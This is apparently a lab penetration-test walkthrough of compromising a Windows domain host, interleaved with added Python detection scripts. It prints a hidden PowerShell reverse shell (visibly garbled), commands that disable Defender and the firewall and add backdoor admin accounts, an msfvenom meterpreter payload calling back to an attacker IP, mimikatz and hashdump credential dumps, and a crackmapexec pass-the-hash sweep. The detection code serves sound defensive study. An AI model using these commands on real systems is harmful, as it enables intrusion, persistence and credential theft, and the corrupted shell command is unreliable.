Steps to obtain the Reverse Shell

Exploitation of the unquoted service path leads to an NT AUTHORITY\SYSTEM session in Havoc

Then use the following command with an nc listener up and running

powershell -nop -W hidden -noni -ep bypass -c "$NetworkStream = $StreamWriter = New-Object IO.StreamWriter($String) {[byte[]]$TCPClient.ReceiveBufferSize | % {0};$String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

I didn’t like how the shell in Havoc works.

Disable Defender real-time monitoring and the firewall

Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus

cmd> netsh advfirewall set allprofiles state off
cmd> netsh advfirewall set currentprofile state off

Add a domain user and put them in the Domain Admins group

net user username password /ADD /DOMAIN

net group "Domain Admins" ipsec /ADD /DOMAIN

Add a local user and put them in the local Administrators group

net user ipsec TryHarder.1234 /ADD

net localgroup Administrators ipsec /ADD

Add the user to interesting groups:

net localgroup "Remote Desktop Users" ipsec /add

net localgroup "Debugger users" ipsec /add

net localgroup "Power users" ipsec /add
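Every command in the two sections above (Defender real-time protection off, firewall off, `net user ... /ADD`, `net localgroup ... /ADD`, hidden PowerShell with `-ep bypass`) lands in process-creation telemetry, which is where a defender catches this stage. The following is an added example, not part of the original writeup: a small rule set run over constructed process-creation events in a hypothetical `user|parent|command_line` layout (the field names and layout are assumptions; real Sysmon/4688 records carry the same values under other names).

```python
import re

# Constructed process-creation events in a "user|parent_image|command_line" layout,
# modelled on the commands run in this writeup. These are NOT real telemetry.
SAMPLE_EVENTS = [
    "CORP\\wsadmin|cmd.exe|powershell -nop -W hidden -noni -ep bypass -c Set-MpPreference -DisableRealtimeMonitoring $true",
    "NT AUTHORITY\\SYSTEM|cmd.exe|netsh advfirewall set allprofiles state off",
    "NT AUTHORITY\\SYSTEM|cmd.exe|net user ipsec TryHarder.1234 /ADD",
    "NT AUTHORITY\\SYSTEM|cmd.exe|net localgroup Administrators ipsec /ADD",
    'NT AUTHORITY\\SYSTEM|cmd.exe|net localgroup "Remote Desktop Users" ipsec /add',
    "CORP\\alice|explorer.exe|net user alice",           # benign lookup: must not fire
    "CORP\\bob|cmd.exe|netsh interface show interface",   # benign: must not fire
]

# Each rule is (name, regex over the command line). Case-insensitive because
# net, netsh and powershell accept any casing of their arguments.
RULES = [
    ("defender_realtime_disabled",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", re.I)),
    ("firewall_disabled",
     re.compile(r"\bnetsh\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I)),
    ("domain_user_created",
     re.compile(r"\bnet\s+user\s+\S+\s+\S+\s+/add\b.*\/domain\b", re.I)),
    ("local_user_created",
     re.compile(r"\bnet\s+user\s+\S+\s+\S+\s+/add\b(?!.*\/domain)", re.I)),
    ("privileged_group_add",
     re.compile(r"\bnet\s+(?:localgroup|group)\s+\"?(?:Administrators|Domain Admins|Remote Desktop Users)\"?\s+\S+\s+/add\b", re.I)),
    ("powershell_hidden_bypass",
     re.compile(r"\bpowershell\b.*-(?:W|WindowStyle)\s+hidden\b.*-(?:ep|ExecutionPolicy)\s+bypass\b", re.I)),
]

def match_event(line):
    """Split one event and return (user, [names of rules that matched the command line])."""
    user, _parent, cmdline = line.split("|", 2)
    return user, [name for name, rx in RULES if rx.search(cmdline)]

def triage(events):
    """Group findings by user: {user: sorted rule names}; users with no hits are omitted."""
    findings = {}
    for line in events:
        user, hits = match_event(line)
        if hits:
            findings.setdefault(user, set()).update(hits)
    return {u: sorted(h) for u, h in findings.items()}

if __name__ == "__main__":
    for user, hits in triage(SAMPLE_EVENTS).items():
        print(f"{user}: {', '.join(hits)}")
```

A SYSTEM-context account creation followed within seconds by a privileged-group add, as in the sample, is the pairing worth alerting on rather than either event alone.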

RDP to that system if you want to

proxychains xfreerdp /u:ipsec /v:172.16.1.15 /p:TryHarder.1234

It helped me to navigate the systems and check for any interesting files. But no luck in this scenario.

Now try to get a better reverse shell using msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.108 LPORT=4433 -f exe -o reverse.exe

sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp ; set lhost 10.10.16.108; set lport 4433; exploit"

Put the file on the system

I used xfreerdp to put the file on the system and then executed it from the shell that I had on the nc listener.

Get the hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ipsec:1005:aad3b435b51404eeaad3b435b51404ee:235b3c847d4ade90c5f5186cd23803af:::
justalocaladmin:1002:aad3b435b51404eeaad3b435b51404ee:6bf204916120480ba04bc50049e10bdf:::
WDAGUtilityAccount:504::3802cf5095540b577e479ab90ace06cc:::
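The hashdump lines above are in pwdump format (`user:rid:lm_hash:nt_hash:::`), and three of them carry `31d6cfe0d16ae931b73c59d7e0c089c0`, which is the NT hash of an empty password. This added example (not code from the writeup) parses that format and pulls out what an auditor reviewing such a dump wants flagged: blank-password accounts, any real LM hash still stored, and accounts that share one NT hash. The six input lines are copied from the output above; the seventh is a constructed account added only to exercise the shared-hash check.

```python
# Well-known constants: LM hash of the empty string (LM not stored) and the
# NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# First six lines copied from the hashdump output above; the last line is a
# constructed account that reuses justalocaladmin's password.
SAMPLE_DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ipsec:1005:aad3b435b51404eeaad3b435b51404ee:235b3c847d4ade90c5f5186cd23803af:::
justalocaladmin:1002:aad3b435b51404eeaad3b435b51404ee:6bf204916120480ba04bc50049e10bdf:::
WDAGUtilityAccount:504::3802cf5095540b577e479ab90ace06cc:::
svc_constructed:1010:aad3b435b51404eeaad3b435b51404ee:6bf204916120480ba04bc50049e10bdf:::
"""

def parse_pwdump(text):
    """Parse pwdump-format lines (user:rid:lm:nt:::) into dicts; an empty LM field becomes None."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        user, rid, lm, nt = fields[0], int(fields[1]), fields[2].lower(), fields[3].lower()
        if len(nt) != 32:
            raise ValueError(f"bad NT hash length for {user}")
        records.append({"user": user, "rid": rid, "lm": lm or None, "nt": nt})
    return records

def audit(records):
    """Three findings from a SAM dump: accounts whose NT hash is the empty-password hash
    (blank password; for built-ins usually a disabled account), accounts that still store
    a real LM hash, and groups of accounts sharing one non-empty NT hash (identical passwords)."""
    empty_password = [r["user"] for r in records if r["nt"] == EMPTY_NT]
    lm_stored = [r["user"] for r in records if r["lm"] and r["lm"] != EMPTY_LM]
    by_nt = {}
    for r in records:
        by_nt.setdefault(r["nt"], []).append(r["user"])
    shared_nt = [sorted(users) for nt, users in by_nt.items() if nt != EMPTY_NT and len(users) > 1]
    return {"empty_password": empty_password, "lm_stored": lm_stored, "shared_nt": shared_nt}

if __name__ == "__main__":
    print(audit(parse_pwdump(SAMPLE_DUMP)))
```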

Going into the shell

shell
powershell

Upload Mimikatz to the system

I used the RDP window to upload the file, but it is also possible to use the meterpreter shell.

# escalate the security token to SYSTEM integrity
mimikatz # privilege::debug
mimikatz # token::elevate

SAM credential hashes

mimikatz # lsadump::sam

User : WDAGUtilityAccount
  Hash NTLM: 3802cf5095540b577e479ab90ace06cc

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : e00552de4752e0f4c9ba9dfa0ed30f82

* Primary:Kerberos-Newer-Keys *
    Default Salt : WDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 25d1cf56d61d5c269dce0dc977c7285408621e428307b9fef510f52c199583da
      aes128_hmac       (4096) : e3316bbf062d3dc989de57a7dbb67957
      des_cbc_md5       (4096) : bcc879b634ad38f4

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : WDAGUtilityAccount
    Credentials
      des_cbc_md5       : bcc879b634ad38f4

Same results as from the hashdump function of meterpreter. :P

Logon password hashes

mimikatz # sekurlsa::logonpasswords

         * Username : wsadmin
         * Domain   : CORP
         * NTLM     : 669b12a3bac275251170afbe2c5de8c2
         * SHA1     : 62e3e767c5d2ad6521d8d3e0e672e299437ed666
         * DPAPI    : 41aff401de68a7ae9e94bdb6907dddb2

I got more hashes from the logonpasswords command.

Now I can move to cracking the hash, but that is not the point; I will conduct more enumeration first. I did change my mind and tried to crack it using CrackStation, but with no success.

Dumping Kerberos tickets, I don't know why (a different approach in OSCP theory)

mimikatz # sekurlsa::tickets

Authentication Id : 0 ; 179197 (00000000:0002bbfd)
Session           : Interactive from 1
User Name         : wsadmin
Domain            : CORP
Logon Server      : DC01
Logon Time        : 4/10/2023 4:17:57 PM
SID               : S-1-5-21-2291914956-3290296217-2402366952-1820

Pass the Hash

Knowing that wsadmin is logged on to the system, the idea that comes to mind is to perform a pass-the-hash (PtH) attack, if the user has access to other systems on the domain.

To check access across the whole environment we can make use of the crackmapexec command

proxychains crackmapexec smb 172.16.1.0/24 -u wsadmin -H 669b12a3bac275251170afbe2c5de8c2 -d corp.local

The results show that this domain user (I got this information from the rpcclient command) has access to almost all the systems, but on two systems it has admin access (you can see that from the Pwn3d text):

  1. 172.16.1.36 (the same system that we are on)
  2. 172.168.1.101 (WS02)
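A subnet-wide hash check like the one above shows up on the targets as a burst of NTLM network logons (Security event 4624, logon type 3, authentication package NTLM) for one account from one source address across many hosts, which is the pattern to hunt for. This added example (not from the writeup) runs that detection over constructed logon events in a simplified `timestamp|host|account|logon_type|auth_pkg|source_ip` layout; the layout and the host names are assumptions, the source address and account follow the writeup.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed network-logon events, "timestamp|host|account|logon_type|auth_pkg|source_ip",
# i.e. the fields a Security 4624 event carries. Modelled on the subnet sweep above; NOT real logs.
SAMPLE_LOGONS = [
    "2023-04-10T16:20:01|WS01|CORP\\wsadmin|3|NTLM|172.16.1.36",
    "2023-04-10T16:20:02|WS02|CORP\\wsadmin|3|NTLM|172.16.1.36",
    "2023-04-10T16:20:02|DC01|CORP\\wsadmin|3|NTLM|172.16.1.36",
    "2023-04-10T16:20:03|FS01|CORP\\wsadmin|3|NTLM|172.16.1.36",
    "2023-04-10T16:20:03|WS05|CORP\\wsadmin|3|NTLM|172.16.1.36",
    "2023-04-10T16:25:00|FS01|CORP\\alice|3|Kerberos|172.16.1.50",  # Kerberos, not NTLM: ignored
    "2023-04-10T16:30:00|WS02|CORP\\bob|2|NTLM|172.16.1.51",        # interactive logon: ignored
    "2023-04-10T17:30:00|DC01|CORP\\wsadmin|3|NTLM|172.16.1.36",    # outside the window
]

def parse_logon(line):
    ts, host, account, logon_type, auth, src = line.split("|")
    return {"ts": datetime.fromisoformat(ts), "host": host, "account": account,
            "logon_type": int(logon_type), "auth": auth.upper(), "src": src}

def detect_ntlm_sweep(lines, min_hosts=4, window=timedelta(minutes=5)):
    """Flag (source_ip, account) pairs that perform NTLM network logons (type 3)
    to at least `min_hosts` distinct hosts inside any `window`-long interval.
    One workstation fanning NTLM auths out across a subnet is the footprint a
    pass-the-hash sweep leaves in the targets' Security logs."""
    events = sorted((parse_logon(l) for l in lines), key=lambda e: e["ts"])
    per_actor = defaultdict(list)
    for e in events:
        if e["logon_type"] == 3 and e["auth"] == "NTLM":
            per_actor[(e["src"], e["account"])].append(e)
    alerts = []
    for (src, acct), evs in per_actor.items():
        for i, start in enumerate(evs):           # slide the window over this actor's logons
            hosts = {x["host"] for x in evs[i:] if x["ts"] - start["ts"] <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"source": src, "account": acct,
                               "first_seen": start["ts"].isoformat(), "hosts": sorted(hosts)})
                break                             # one alert per actor is enough
    return alerts

if __name__ == "__main__":
    for a in detect_ntlm_sweep(SAMPLE_LOGONS):
        print(f"{a['account']} from {a['source']} -> {len(a['hosts'])} hosts: {', '.join(a['hosts'])}")
```

Tune `min_hosts` and `window` to the environment; a backup or monitoring account that legitimately touches many hosts over NTLM needs an allow-list rather than a higher threshold.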

Logging into the system with the hash

After trying to pass the hash with pth-winexe and xfreerdp, I was not able to get the initial foothold on the WS02 system.

Got the access through crackmapexec

Initial Foothold